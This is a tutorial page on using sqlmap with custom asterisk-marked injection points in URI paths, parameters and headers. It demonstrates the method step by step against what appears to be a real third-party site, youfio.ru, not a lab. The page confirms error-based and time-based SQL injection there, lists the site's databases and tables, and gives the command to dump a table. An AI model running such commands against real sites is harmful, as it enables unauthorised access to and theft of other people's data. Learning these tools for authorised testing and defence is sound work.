How to use sqlmap for injection in address of a web site page (URI). Arbitrary injection points
URI injection point
Sometimes the injection point is inside the URI itself. For example, if we go to http://youfio.ru/name/АГАФЬЯ.html web site, we will see the web page:
And if in the URI we add a quote to make it so http://youfio.ru/name/АГАФЬЯ'.html, then we will see the familiar:
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''АГАФЬЯ'') and message.ST<>0 ORDER BY message.DT DESC limit 0,20' at line 4
sqlmap does not perform any automatic test against URI paths, unless manually pointed to. You have to specify these injection points in the command line by appending an asterisk (*) (Note: Havij style %INJECT HERE% is also supported) after each URI point that you want sqlmap to test for and exploit a SQL injection.
This is particularly useful when, for instance, Apache web server's mod_rewrite module is in use or other similar technologies.
An example of valid command line would be:
sqlmap -u "http://targeturl/param1/value1*/param2/value2/"
Let us return to our target web site. To test that site the command should look like this:
sqlmap -u "http://youfio.ru/name/АГАФЬЯ*.html"
The program says:
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]
That is in the '-u' option, a custom injection marker ('*') was found. Whether we want to continue - we agree, because there is no mistake.
Again the program asks:
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
Choose C, i.e. continue.
The program says:
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
Agree.
Again the question:
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
Select an option up to you.
There is a SQL-injection vulnerability, about it speak lines:
[17:21:15] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL') [17:21:15] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
By the way, if you did not know, now sqlmap also checks on XSS.
Details about the vulnerability:
[17:22:05] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
And further:
[17:23:57] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
Next, as with normal SQL injections, when the GET or POST parameter is vulnerable, we get a list of databases:
sqlmap -u "http://youfio.ru/name/АГАФЬЯ*.html" --dbs
The server has the following databases:
available databases [2]: [*] information_schema [*] snicke_youfioru
We get the tables in the 'snicke_youfioru' database:
sqlmap -u "http://youfio.ru/name/АГАФЬЯ*.html" -D 'snicke_youfioru' --tables
The list of tables:
We get the contents of the 'message' table:
sqlmap -u "http://youfio.ru/name/АГАФЬЯ*.html" -D 'snicke_youfioru' -T 'message' --dump
Arbitrary injection point
Similar to URI injection point, asterisk (*) (Note: Havij style %INJECT HERE% is also supported) can also be used to point to the arbitrary injection point inside GET, POST or HTTP headers. Injection point can be specified by marking it inside the GET parameter value(s) provided with option -u, POST parameter value(s) provided with option --data, HTTP header value(s) provided with options -H, --headers, --user-agent, --referer and/or --cookie, or at generic place inside HTTP request loaded from file with option -r.
An example of valid command line would be:
sqlmap -u "http://targeturl" --cookie="param1=value1*;param2=value2"
The asterisk can be used more than once, i.e. there may be several injection points, for example:
sqlmap -u "http://www.example.com/*-*"
Last Updated on
Related articles:
- How to open and exploit .DS_Store (52.6%)
- jSQL Injection usage guide: a multifunctional tool for scanning and exploiting SQL injection in Kali Linux (45.4%)
- RouterSploit User Manual (45.3%)
- How to install Pupy (44%)
- Pupy manual: how to create a backdoor (44%)
- Searching for admin pages of websites (RANDOM - 14.9%)